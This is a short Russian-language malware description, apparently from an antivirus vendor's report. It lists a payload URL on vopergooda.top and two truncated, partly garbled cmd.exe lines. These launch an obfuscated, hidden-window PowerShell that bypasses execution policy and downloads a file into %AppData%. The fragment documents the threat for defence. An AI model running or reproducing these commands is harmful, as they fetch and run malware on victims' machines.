Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowErsheLl.Exe -ExEcutIonPOLICzn znYPAss -nopROFile -wArdowstYLe hIDDen (neW-object system.NeT.WEBCLiENt).DOwNLoADfiLe('http://www.vopergooda.top/read.php?f=1.gif','%ApPdAtA...
- '<SYSTEM32>\cmd.exe' /c "PowErsheLl.Exe -ExEcutIonPOLICzn znYPAss -nopROFile -wArdowstYLe hIDDen (neW-object system.NeT.WEBCLiENt).DOwNLoADfiLe('http://www.vopergooda.top/read.php?f=1.gif','%ApPdAtA...' (со скрытым окном)